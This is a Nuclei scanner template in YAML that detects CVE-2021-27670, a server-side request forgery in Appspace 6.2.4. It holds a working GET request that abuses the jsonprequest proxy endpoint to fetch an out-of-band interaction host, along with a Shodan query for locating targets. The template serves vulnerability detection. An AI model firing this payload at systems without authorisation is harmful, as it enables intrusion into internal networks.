46 lines
1.4 KiB
YAML
46 lines
1.4 KiB
YAML
id: CVE-2021-27670
|
|
|
|
info:
|
|
name: Appspace 6.2.4 - Server-Side Request Forgery
|
|
author: ritikchaddha
|
|
severity: critical
|
|
description: Appspace 6.2.4 allows SSRF via the api/v1/core/proxy/jsonprequest url parameter.
|
|
remediation: |
|
|
Upgrade to a patched version of Appspace 6.2.4 or apply the necessary security patches provided by the vendor.
|
|
reference:
|
|
- https://github.com/h3110mb/PoCSSrfApp
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-27670
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 9.8
|
|
cve-id: CVE-2021-27670
|
|
cwe-id: CWE-918
|
|
epss-score: 0.35076
|
|
epss-percentile: 0.96645
|
|
cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: appspace
|
|
product: appspace
|
|
shodan-query: title:"Appspace"
|
|
tags: cve,cve2023,appspace,ssrf
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/api/v1/core/proxy/jsonprequest?objresponse=false&websiteproxy=true&escapestring=false&url=http://oast.live'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<h1> Interactsh Server </h1>"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# digest: 4b0a00483046022100c0bf5606c43427429cd4fe6cf17f0ab850a09c65ab27da1e8096e6b2649ebc38022100f8781786d96eaa45050b1f1a23877e253065096534406b40035d002f4a8fc1ae:922c64590222798bb761d5b6d8e72950
|